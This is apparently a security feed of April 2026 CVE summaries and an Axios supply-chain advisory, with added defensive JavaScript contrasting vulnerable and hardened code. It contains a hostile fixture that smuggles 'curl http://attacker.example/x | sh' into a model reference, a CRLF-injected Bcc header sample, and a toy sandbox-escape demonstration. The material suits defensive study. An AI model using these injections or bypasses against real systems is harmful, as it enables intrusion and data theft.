2026-04-06 17:17Z · HIGH

CVE-2026-34975 — Plunk: Prior to 0.8.0, a CRLF header injection vulnerability was discovered in SESService.ts, where user-supplied

NVD (auto-promoted CVEs) · nvd.nist.gov · CVE-2026-34975

Plunk is an open-source email platform built on top of AWS SES. Prior to 0.8.0, a CRLF header injection vulnerability was discovered in SESService.ts, where user-supplied values for from.name, subject, custom header keys/values, and attachment filenames were interpolated directly into raw MIME messages without sanitization. An authenticated API user could inject arbitrary email headers (e.g. Bcc, Reply-To) by embedding carriage return/line feed characters in these fields, ena CVSSv3.1 8.5 (HIGH)
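
The header interpolation described above, as an added example that is not Plunk's code: a raw MIME header block is built twice, once by direct interpolation (the pattern the advisory attributes to SESService.ts before 0.8.0) and once with CR/LF rejected and header names restricted to RFC 5322 field-name characters. Only the field names (from.name, subject, custom headers) come from the advisory; the builder functions, the header-name regex and the sample message are constructed for this illustration.

```javascript
// Vulnerable: user-controlled strings are interpolated straight into the header block, so a value
// containing "\r\n" starts a new header line that the receiving MTA will honour.
function buildHeadersVulnerable(msg) {
  const lines = [
    `From: ${msg.from.name} <${msg.from.address}>`,
    `To: ${msg.to}`,
    `Subject: ${msg.subject}`,
  ];
  for (const [k, v] of Object.entries(msg.headers || {})) lines.push(`${k}: ${v}`);
  return lines.join('\r\n') + '\r\n';
}

// Hardened: refuse any CR or LF in a header value and restrict header names to RFC 5322 "ftext"
// (printable ASCII except ':'). Rejecting rather than stripping keeps the API from sending a message
// the caller did not intend; non-ASCII display names belong in RFC 2047 encoded-words, not raw.
const HEADER_NAME_RE = /^[!-9;-~]+$/; // assumption: field-name grammar from RFC 5322 section 3.6.8

function assertNoCrlf(field, value) {
  if (/[\r\n]/.test(String(value))) throw new Error(`${field}: CR/LF not allowed in header value`);
  return String(value);
}

function buildHeadersHardened(msg) {
  const lines = [
    `From: ${assertNoCrlf('from.name', msg.from.name)} <${assertNoCrlf('from.address', msg.from.address)}>`,
    `To: ${assertNoCrlf('to', msg.to)}`,
    `Subject: ${assertNoCrlf('subject', msg.subject)}`,
  ];
  for (const [k, v] of Object.entries(msg.headers || {})) {
    if (!HEADER_NAME_RE.test(k)) throw new Error(`invalid header name: ${JSON.stringify(k)}`);
    lines.push(`${k}: ${assertNoCrlf(k, v)}`);
  }
  return lines.join('\r\n') + '\r\n';
}

// How many times a header appears in a raw block, i.e. what a receiving MTA would see.
function countHeader(raw, name) {
  const prefix = name.toLowerCase() + ':';
  return raw.split('\r\n').filter((l) => l.toLowerCase().startsWith(prefix)).length;
}

// Constructed attacker input: a display name that smuggles a Bcc header.
const INJECTED_MESSAGE = {
  from: { name: 'Alice\r\nBcc: attacker@example.invalid', address: 'alice@example.invalid' },
  to: 'bob@example.invalid',
  subject: 'Hello',
  headers: { 'X-Campaign': 'spring' },
};
```

The same check has to cover attachment filenames (the advisory lists them too), because a filename ends up in a Content-Disposition header of its own MIME part.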

CWE: 93 · VND: Plunk · TYP: Vulnerability
CVSS v3.1: 8.5 · Score: 93
2026-04-06 17:17Z · CRIT

CVE-2026-34841 — Bruno: Prior to 3.2.1, Bruno was affected by a supply chain attack involving compromised versions

NVD (auto-promoted CVEs) · nvd.nist.gov · CVE-2026-34841

Bruno is an open source IDE for exploring and testing APIs. Prior to 3.2.1, Bruno was affected by a supply chain attack involving compromised versions of the axios npm package, which introduced a hidden dependency deploying a cross-platform Remote Access Trojan (RAT). Users of @usebruno/cli who ran npm install between 00:21 UTC and ~03:30 UTC on March 31, 2026 may have been impacted. Upgrade to 3.2.1 CVSSv3.1 9.8 (CRITICAL)

CWE: 506, 494 · VND: Bruno · TYP: Vulnerability
CVSS v3.1: 9.8 · Score: 99
2026-04-06 17:17Z · HIGH

CVE-2026-34783 — Montferret Ferret: Prior to 2.0.0-alpha.4, a path traversal vulnerability in Ferret's IO::FS::WRITE standard library function allows

NVD (auto-promoted CVEs) · nvd.nist.gov · CVE-2026-34783

Ferret is a declarative system for working with web data. Prior to 2.0.0-alpha.4, a path traversal vulnerability in Ferret's IO::FS::WRITE standard library function allows a malicious website to write arbitrary files to the filesystem of the machine running Ferret. When an operator scrapes a website that returns filenames containing ../ sequences, and uses those filenames to construct output paths (a standard scraping pattern), the attacker controls both the destination path CVSSv3.1 8.1 (HIGH)

CWE: 22, 73 · VND: Montferret, Ferret · TYP: Vulnerability
CVSS v3.1: 8.1 · Score: 91
2026-04-06 16:16Z · HIGH

CVE-2026-34982 — Vim: Prior to version 9.2.0276, a modeline sandbox bypass in Vim allows arbitrary OS command

NVD (auto-promoted CVEs) · nvd.nist.gov · CVE-2026-34982

Vim is an open source, command line text editor. Prior to version 9.2.0276, a modeline sandbox bypass in Vim allows arbitrary OS command execution when a user opens a crafted file. The `complete`, `guitabtooltip` and `printheader` options are missing the `P_MLE` flag, allowing a modeline to be executed. Additionally, the `mapset()` function lacks a `check_secure()` call, allowing it to be abused from sandboxed expressions. Commit 9.2.0276 fixes the issue. CVSSv3.1 8.2 (HIGH)

CWE: 78 · VND: Vim · TYP: Vulnerability
CVSS v3.1: 8.2 · Score: 91
2026-04-06 16:16Z · CRIT

CVE-2026-34950 — fast-jwt: In 6.1.0 and earlier, the publicKeyPemMatcher regex in fast-jwt/src/crypto.js uses a ^ anchor that is defeated by any leading whitespace

NVD (auto-promoted CVEs) · nvd.nist.gov · CVE-2026-34950

fast-jwt provides fast JSON Web Token (JWT) implementation. In 6.1.0 and earlier, the publicKeyPemMatcher regex in fast-jwt/src/crypto.js uses a ^ anchor that is defeated by any leading whitespace in the key string, re-enabling the exact same JWT algorithm confusion attack that CVE-2023-48223 patched. CVSSv3.1 9.1 (CRITICAL)

CWE: 327 · TYP: Vulnerability
CVSS v3.1: 9.1 · Score: 96
2026-04-06 16:16Z · HIGH

CVE-2026-34940 — Kubeai Kubeai: Prior to 0.23.2, the ollamaStartupProbeScript() function in internal/modelcontroller/engine_ollama.go constructs a shell command string using

NVD (auto-promoted CVEs) · nvd.nist.gov · CVE-2026-34940

KubeAI is an AI inference operator for kubernetes. Prior to 0.23.2, the ollamaStartupProbeScript() function in internal/modelcontroller/engine_ollama.go constructs a shell command string using fmt.Sprintf with unsanitized model URL components (ref, modelParam). This shell command is executed via bash -c as a Kubernetes startup probe. An attacker who can create or update Model custom resources can inject arbitrary shell commands that execute inside model server pods. This vuln CVSSv3.1 8.8 (HIGH)
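
The command construction described above, as an added example that is not KubeAI's code: a probe script assembled by string formatting from Model fields, beside two fixes, validating the reference against the grammar it is supposed to have, and passing the values as positional arguments to bash instead of splicing them into the script text. The field names ref and modelParam come from the advisory; the script body, the reference regex and the sample values are assumptions for this illustration.

```javascript
// Vulnerable: the Go fmt.Sprintf pattern, reproduced as a template string. Whatever is in `ref`
// becomes shell syntax once the string reaches `bash -c`.
function probeScriptVulnerable(ref, modelParam) {
  return `ollama pull ${ref} && ollama show ${modelParam}`;
}

// Fix 1: validate each component before it gets anywhere near a shell. The pattern is an assumed
// approximation of a registry-style model reference (repo path plus optional tag).
const MODEL_REF_RE = /^[a-z0-9]+(?:[._/-][a-z0-9]+)*(?::[A-Za-z0-9._-]+)?$/;

function validateRef(ref) {
  if (typeof ref !== 'string' || ref.length > 255 || !MODEL_REF_RE.test(ref)) {
    throw new Error(`invalid model reference: ${JSON.stringify(ref)}`);
  }
  return ref;
}

// Fix 2: do not build a shell string at all. A Kubernetes exec probe takes an argv array, so the
// values can be handed to bash positionally; the script sees "$1" and "$2", never their text.
// Argument after the script is $0 (here the literal "probe"), then $1, $2.
function probeCommandHardened(ref, modelParam) {
  return ['bash', '-c', 'ollama pull "$1" && ollama show "$2"', 'probe', validateRef(ref), validateRef(modelParam)];
}

// If interpolation into a script truly cannot be avoided, POSIX single-quote escaping makes the
// value inert; validation still runs first so that escaping is a second line of defence, not the only one.
function shellQuote(s) {
  return `'${s.replace(/'/g, `'\\''`)}'`;
}

function probeScriptQuoted(ref, modelParam) {
  return `ollama pull ${shellQuote(validateRef(ref))} && ollama show ${shellQuote(validateRef(modelParam))}`;
}

// Constructed Model spec values.
const HOSTILE_REF = 'llama3:8b; curl http://attacker.example/x | sh';
const BENIGN_REF = 'library/llama3:8b';
```

The hardening matters beyond the pod itself: the probe runs with the model server pod's service account and network position, so an injected command is a foothold inside the cluster, not just inside one container.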

CWE: 78 · VND: Kubeai · TYP: Vulnerability
CVSS v3.1: 8.8 · Score: 94
2026-04-06 16:16Z · CRIT

CVE-2026-34444 — Scoder Lupa: This allows an attacker to bypass the intended restrictions and eventually achieve arbitrary code

NVD (auto-promoted CVEs) · nvd.nist.gov · CVE-2026-34444

Lupa integrates the runtimes of Lua or LuaJIT2 into CPython. In 2.6 and earlier, attribute_filter is not consistently applied when attributes are accessed through built-in functions like getattr and setattr. This allows an attacker to bypass the intended restrictions and eventually achieve arbitrary code execution. CVSSv3.1 10.0 (CRITICAL) · EPSS 8th percentile

CWE: 639, 284 · VND: Scoder, Lupa · TYP: Vulnerability
CVSS v3.1: 10.0 · Score: 100
2026-04-06 16:16Z · CRIT

CVE-2026-34208 — Nyariv Sandboxjs: Prior to 0.8.36, SandboxJS blocks direct assignment to global objects (for example Math.random =

NVD (auto-promoted CVEs) · nvd.nist.gov · CVE-2026-34208

SandboxJS is a JavaScript sandboxing library. Prior to 0.8.36, SandboxJS blocks direct assignment to global objects (for example Math.random = ...), but this protection can be bypassed through an exposed callable constructor path: this.constructor.call(target, attackerObject). Because this.constructor resolves to the internal SandboxGlobal function and Function.prototype.call is allowed, attacker code can write arbitrary properties into host global objects and persist those m CVSSv3.1 10.0 (CRITICAL)
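
The shape of the bypass, as an added toy example that is not SandboxJS's code: a sandbox whose global object is built by a constructor that copies host values onto `this`, an assignment policy that blocks direct writes to those host values, and untrusted code that reaches the same constructor through `this.constructor` and invokes it with `Function.prototype.call` against a host object. The constructor, the assignment check and the stand-in Math object are assumptions modelled on the advisory's description; the library's real internals are not reproduced. The guarded variant shows one generic mitigation, refusing to run when not invoked with `new`.

```javascript
// A local stand-in for the host's Math so the example never touches the real global.
function makeHost() {
  return { Math: { random: () => 0.5 } };
}

// Populates the sandbox global from a map of host values. Invoked through .call(target, obj),
// `this` is whatever the caller chose, so the loop writes obj's properties onto that target.
function SandboxGlobalToy(globals) {
  for (const name of Object.keys(globals)) this[name] = globals[name];
}

// Guarded variant: a constructor that refuses plain-call invocation cannot be retargeted.
function SandboxGlobalGuarded(globals) {
  if (new.target === undefined) throw new TypeError('SandboxGlobal may only be invoked with new');
  for (const name of Object.keys(globals)) this[name] = globals[name];
}

// The interpreter's assignment policy: direct writes to any exposed host global are blocked.
function sandboxAssign(sandboxGlobal, target, prop, value) {
  for (const name of Object.keys(sandboxGlobal)) {
    if (sandboxGlobal[name] === target) throw new Error(`assignment to host global ${name}.${prop} blocked`);
  }
  target[prop] = value;
}

// "Untrusted code": tries the direct write first (blocked), then the constructor path.
function runUntrusted(GlobalCtor, host) {
  const self = new GlobalCtor(host); // what `this` resolves to inside the sandbox
  const result = { directBlocked: false, viaConstructor: false, hostRandom: null };
  try {
    sandboxAssign(self, self.Math, 'random', () => 4);
  } catch (e) {
    result.directBlocked = true;
  }
  try {
    // this.constructor.call(target, attackerObject): copies attackerObject onto the host object.
    self.constructor.call(self.Math, { random: () => 4 });
    result.viaConstructor = true;
  } catch (e) {
    result.viaConstructor = false;
  }
  result.hostRandom = host.Math.random(); // observed from the host side, after the sandbox ran
  return result;
}
```

The `new.target` check is the narrow fix for this constructor; the broader one is to keep internal functions off the prototype chain the sandboxed code can walk, and to treat `call`, `apply` and `bind` on any host function as a capability in their own right.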

CWE: 693, 915 · VND: Nyariv, Sandboxjs · TYP: Vulnerability
CVSS v3.1: 10.0 · Score: 100
2026-04-06 16:16Z · HIGH

CVE-2026-33752 — Lexiforest Curl_cffi: In addition, curl_cffi's TLS impersonation feature can make these requests appear as legitimate browser

NVD (auto-promoted CVEs) · nvd.nist.gov · CVE-2026-33752

curl_cffi is a Python binding for curl. Prior to 0.15.0, curl_cffi does not restrict requests to internal IP ranges, and follows redirects automatically via the underlying libcurl. Because of this, an attacker-controlled URL can redirect requests to internal services such as cloud metadata endpoints. In addition, curl_cffi's TLS impersonation feature can make these requests appear as legitimate browser traffic, which may bypass certain network controls. This vulnerability CVSSv3.1 8.6 (HIGH)

CWE: 918 · VND: Lexiforest · TYP: Vulnerability
CVSS v3.1: 8.6 · Score: 93
2026-04-06 16:16Z · HIGH

CVE-2025-47392 — Qualcomm 5g_fixed_wireless_access_platform_firmware: Memory corruption when decoding corrupted satellite data files with invalid signature offsets.

NVD (auto-promoted CVEs) · nvd.nist.gov · CVE-2025-47392

Memory corruption when decoding corrupted satellite data files with invalid signature offsets. CVSSv3.1 8.8 (HIGH)

CWE: 190 · VND: Qualcomm · TYP: Vulnerability
CVSS v3.1: 8.8 · Score: 94
2026-04-06 15:17Z · HIGH

CVE-2026-34885 — David Lingren Media Library Assistant: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in

NVD (auto-promoted CVEs) · nvd.nist.gov · CVE-2026-34885

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in David Lingren Media Library Assistant allows SQL Injection. This issue affects Media Library Assistant: from n/a through 3.34. CVSSv3.1 8.5 (HIGH) · EPSS 89th percentile

CWE: 89 · TYP: Vulnerability
CVSS v3.1: 8.5 · Score: 94
2026-04-06 15:17Z · HIGH

CVE-2026-33510 — Homarr Homarr: Prior to 1.57.0, a DOM-based Cross-Site Scripting (XSS) vulnerability has been discovered in Homarr's

NVD (auto-promoted CVEs) · nvd.nist.gov · CVE-2026-33510

Homarr is an open-source dashboard. Prior to 1.57.0, a DOM-based Cross-Site Scripting (XSS) vulnerability has been discovered in Homarr's /auth/login page. The application improperly trusts a URL parameter (callbackUrl), which is passed to redirect and router.push. An attacker can craft a malicious link that, when opened by an authenticated user, performs a client-side redirect and executes arbitrary JavaScript in the context of their browser. This could lead to credential th CVSSv3.1 8.8 (HIGH)

CWE: 601, 87 · VND: Homarr · TYP: Vulnerability
CVSS v3.1: 8.8 · Score: 94
2026-04-06 15:17Z · CRIT

CVE-2026-31151 — Kaleris Yard_management_solutions: An issue in the login mechanism of Kaleris YMS v7.2.2.1 allows attackers to bypass

NVD (auto-promoted CVEs) · nvd.nist.gov · CVE-2026-31151

An issue in the login mechanism of Kaleris YMS v7.2.2.1 allows attackers to bypass login verification to access the application's resources. CVSSv3.1 9.8 (CRITICAL)

CWE: 288 · VND: Kaleris · TYP: Vulnerability
CVSS v3.1: 9.8 · Score: 99
2026-04-06 15:17Z · CRIT

CVE-2026-31059 — Utt 520w_firmware: A remote command execution (RCE) vulnerability in the /goform/formDia component of UTT Aggressive HiPER

NVD (auto-promoted CVEs) · nvd.nist.gov · CVE-2026-31059

A remote command execution (RCE) vulnerability in the /goform/formDia component of UTT Aggressive HiPER 520W v3v1.7.7-180627 allows attackers to execute arbitrary commands via a crafted string. CVSSv3.1 9.8 (CRITICAL)

CWE: 77 · VND: Utt · TYP: Vulnerability
CVSS v3.1: 9.8 · Score: 99
2026-04-06 15:17Z · HIGH

CVE-2026-26263 — Glpi-project Glpi: From 11.0.0 to before 11.0.6, an unauthenticated time-based blind SQL injection exists in GLPI's

NVD (auto-promoted CVEs) · nvd.nist.gov · CVE-2026-26263

GLPI is a free asset and IT management software package. From 11.0.0 to before 11.0.6, an unauthenticated time-based blind SQL injection exists in GLPI's Search engine. This vulnerability is fixed in 11.0.6. CVSSv3.1 8.1 (HIGH)

CWE: 89 · VND: Glpi, Glpi Project · TYP: Vulnerability
CVSS v3.1: 8.1 · Score: 91
2026-04-06 15:17Z · CRIT

CVE-2026-26026 — Glpi-project Glpi: From 11.0.0 to before 11.0.6, template injection by an administrator leads to RCE.

NVD (auto-promoted CVEs) · nvd.nist.gov · CVE-2026-26026

GLPI is a free asset and IT management software package. From 11.0.0 to before 11.0.6, template injection by an administrator leads to RCE. This vulnerability is fixed in 11.0.6. CVSSv3.1 9.1 (CRITICAL)

CWE: 94, 1336 · VND: Glpi, Glpi Project · TYP: Vulnerability
CVSS v3.1: 9.1 · Score: 96
2026-04-06 15:00Z · CRIT

Delivered by Trust: What the Axios Supply Chain Attack Means for Security Leaders

Bishop Fox Labs · bishopfox.com · in the wild

On March 31, 2026, the widely-used Axios NPM package (versions 1.14.1 and 0.30.4) was compromised via a supply chain attack, with malicious versions containing trojanized dependencies that execute platform-specific remote access trojans (RATs) during installation. The attack chain involved compromised maintainer credentials, malicious package publication, staged payload delivery via attacker infrastructure (sfrclak.com, 142.11.206.73:8000), and persistent remote access across client, server, build, and deployment environments. Organizations are advised to immediately identify affected systems, roll back to safe versions, rotate credentials, hunt for indicators of compromise, and implement strategic dependency controls including version pinning, install-script restrictions, and SBOM-based visibility.
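
The dependency controls recommended above, and the exposure check the Bruno advisory (CVE-2026-34841) implies for anyone who ran npm install in the affected window, as one added example that belongs to neither the Bishop Fox piece nor the Bruno project: a scan of an npm lockfile for the compromised axios releases named in the writeup (1.14.1 and 0.30.4), a list of every package npm recorded as having an install script, and a pin check on direct dependencies. The lockfile and package.json fragments are constructed; the hasInstallScript field is the one npm writes into lockfile v2/v3 entries for packages with lifecycle install hooks.

```javascript
// Versions named in the Bishop Fox writeup as the malicious axios releases.
const COMPROMISED_AXIOS = new Set(['1.14.1', '0.30.4']);

// Walk the "packages" map of a lockfile v2/v3. Keys are install paths such as
// "node_modules/@scope/name" or "node_modules/a/node_modules/b"; the package name is the part
// after the last "node_modules/" unless the entry spells it out.
function packageNameFromPath(pkgPath, meta) {
  if (meta.name) return meta.name;
  const marker = 'node_modules/';
  return pkgPath.slice(pkgPath.lastIndexOf(marker) + marker.length);
}

function scanLockfile(lock) {
  const findings = { compromisedAxios: [], installScripts: [] };
  for (const [pkgPath, meta] of Object.entries(lock.packages || {})) {
    if (pkgPath === '') continue; // the root project entry
    const name = packageNameFromPath(pkgPath, meta);
    if (name === 'axios' && COMPROMISED_AXIOS.has(meta.version)) {
      findings.compromisedAxios.push({ path: pkgPath, version: meta.version });
    }
    if (meta.hasInstallScript) {
      findings.installScripts.push({ path: pkgPath, name, version: meta.version });
    }
  }
  return findings;
}

// Direct dependencies should be pinned to an exact version: no ^, ~, ranges, tags or URLs.
const EXACT_VERSION_RE = /^\d+\.\d+\.\d+(?:-[0-9A-Za-z.-]+)?$/;

function unpinnedDependencies(pkg) {
  const out = [];
  for (const section of ['dependencies', 'devDependencies', 'optionalDependencies']) {
    for (const [name, spec] of Object.entries(pkg[section] || {})) {
      if (!EXACT_VERSION_RE.test(spec)) out.push({ name, spec, section });
    }
  }
  return out;
}

// Constructed package.json and package-lock.json fragments for a project that pulled axios through
// a caret range, with a second, nested copy pinned by a dependency.
const SAMPLE_PACKAGE_JSON = { dependencies: { axios: '^1.14.0', '@usebruno/cli': '3.2.0' } };
const SAMPLE_LOCK = {
  lockfileVersion: 3,
  packages: {
    '': { name: 'example-app', version: '1.0.0' },
    'node_modules/axios': { version: '1.14.1', resolved: 'https://registry.npmjs.org/axios/-/axios-1.14.1.tgz' },
    'node_modules/@usebruno/cli': { version: '3.2.0' },
    'node_modules/@usebruno/cli/node_modules/axios': { version: '1.13.0' },
    'node_modules/some-native-addon': { version: '2.0.0', hasInstallScript: true },
  },
};
```

A lockfile hit is a reason to treat the host as compromised, not merely to upgrade: the payload ran at install time, so the response steps above (credential rotation, hunting for the named infrastructure in egress logs) apply regardless of what the current lockfile says. For the preventive control, `npm config set ignore-scripts true` disables lifecycle scripts globally, after which the installScripts list tells you which packages genuinely need an exception.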

TAC: TA0001, TA0003, TA0011 · SRF: Supply Chain · VND: Axios · TYP: Threat Intel, Advisory · STG: Execution
Score: 82
2026-04-06 13:17Z · HIGH

CVE-2026-3524 — Mattermost: Plugin Legal Hold versions <=1.1.4 fail to halt request processing after a failed

NVD (auto-promoted CVEs) · nvd.nist.gov · CVE-2026-3524

Mattermost Plugin Legal Hold versions <=1.1.4 fail to halt request processing after a failed authorization check in ServeHTTP which allows an authenticated attacker to access, create, download, and delete legal hold data via crafted API requests to the plugin's endpoints. Mattermost Advisory ID: MMSA-2026-00621 CVSSv3.1 8.8 (HIGH)

CWE: 862 · VND: Mattermost · TYP: Vulnerability
CVSS v3.1: 8.8 · Score: 94
2026-04-06 08:16Z · HIGH

CVE-2026-31409 — Linux: In the Linux kernel, the following vulnerability has been resolved: ksmbd: unset conn->binding on

NVD (auto-promoted CVEs) · nvd.nist.gov · CVE-2026-31409

In the Linux kernel, the following vulnerability has been resolved: ksmbd: unset conn->binding on failed binding request. When a multichannel SMB2_SESSION_SETUP request with SMB2_SESSION_REQ_FLAG_BINDING fails, ksmbd sets conn->binding = true but never clears it on the error path. This leaves the connection in a binding state where all subsequent ksmbd_session_lookup_all() calls fall back to the global sessions table. This is fixed by clearing conn->binding = false in the error CVSSv3.1 8.8 (HIGH) · EPSS 2nd percentile

TYP: Vulnerability
CVSS v3.1: 8.8 · Score: 94
2026-04-06 08:16Z · HIGH

CVE-2026-31408 — Linux: In the Linux kernel, the following vulnerability has been resolved: Bluetooth: SCO: Fix use-after-free

NVD (auto-promoted CVEs) · nvd.nist.gov · CVE-2026-31408

In the Linux kernel, the following vulnerability has been resolved: Bluetooth: SCO: Fix use-after-free in sco_recv_frame() due to missing sock_hold. sco_recv_frame() reads conn->sk under sco_conn_lock() but immediately releases the lock without holding a reference to the socket. A concurrent close() can free the socket between the lock release and the subsequent sk->sk_state access, resulting in a use-after-free. Other functions in the same file (sco_sock_timeout(), sco_con CVSSv3.1 8.8 (HIGH) · EPSS 2nd percentile

TYP: Vulnerability
CVSS v3.1: 8.8 · Score: 94
2026-04-06 08:16Z · CRIT

CVE-2026-31405 — Linux: When htype equals 255, an out-of-bounds read occurs on the function pointer table, and

NVD (auto-promoted CVEs) · nvd.nist.gov · CVE-2026-31405

In the Linux kernel, the following vulnerability has been resolved: media: dvb-net: fix OOB access in ULE extension header tables. The ule_mandatory_ext_handlers[] and ule_optional_ext_handlers[] tables in handle_one_ule_extension() are declared with 255 elements (valid indices 0-254), but the index htype is derived from network-controlled data as (ule_sndu_type & 0x00FF), giving a range of 0-255. When htype equals 255, an out-of-bounds read occurs on the function pointer ta CVSSv3.1 9.8 (CRITICAL) · EPSS 3rd percentile

TYP: Vulnerability
CVSS v3.1: 9.8 · Score: 99
2026-04-06 06:16Z · HIGH

CVE-2026-5629 — Belkin: The manipulation of the argument webpage results in stack-based buffer overflow.

NVD (auto-promoted CVEs) · nvd.nist.gov · CVE-2026-5629

A vulnerability was detected in Belkin F9K1015 1.00.10. The affected element is the function formSetFirewall of the file /goform/formSetFirewall. The manipulation of the argument webpage results in stack-based buffer overflow. The attack can be executed remotely. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. CVSSv3.1 8.8 (HIGH)

CWE: 121, 119 · VND: Belkin · TYP: Vulnerability
CVSS v3.1: 8.8 · Score: 94
2026-04-06 06:16Z · HIGH

CVE-2026-5628 — Belkin: The manipulation of the argument webpage leads to stack-based buffer overflow.

NVD (auto-promoted CVEs) · nvd.nist.gov · CVE-2026-5628

A security vulnerability has been detected in Belkin F9K1015 1.00.10. Impacted is the function formSetSystemSettings of the file /goform/formSetSystemSettings of the component Setting Handler. The manipulation of the argument webpage leads to stack-based buffer overflow. Remote exploitation of the attack is possible. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way. CVSSv3.1 8.8 (HIGH)

CWE: 121, 119 · TYP: Vulnerability
CVSS v3.1: 8.8 · Score: 94
2026-04-06 04:16Z · HIGH

CVE-2026-5614 — Belkin: The manipulation of the argument webpage results in stack-based buffer overflow.

NVD (auto-promoted CVEs) · nvd.nist.gov · CVE-2026-5614

A security flaw has been discovered in Belkin F9K1015 1.00.10. Impacted is the function formSetPassword of the file /goform/formSetPassword. The manipulation of the argument webpage results in stack-based buffer overflow. The attack may be launched remotely. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way. CVSSv3.1 8.8 (HIGH)

CWE: 121, 119 · TYP: Vulnerability
CVSS v3.1: 8.8 · Score: 94
2026-04-06 03:16Z · HIGH

CVE-2026-5613 — Belkin: The manipulation of the argument webpage leads to stack-based buffer overflow.

NVD (auto-promoted CVEs) · nvd.nist.gov · CVE-2026-5613

A vulnerability was identified in Belkin F9K1015 1.00.10. This issue affects the function formReboot of the file /goform/formReboot. The manipulation of the argument webpage leads to stack-based buffer overflow. The attack may be initiated remotely. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way. CVSSv3.1 8.8 (HIGH)

CWE: 121, 119 · VND: Belkin · TYP: Vulnerability
CVSS v3.1: 8.8 · Score: 94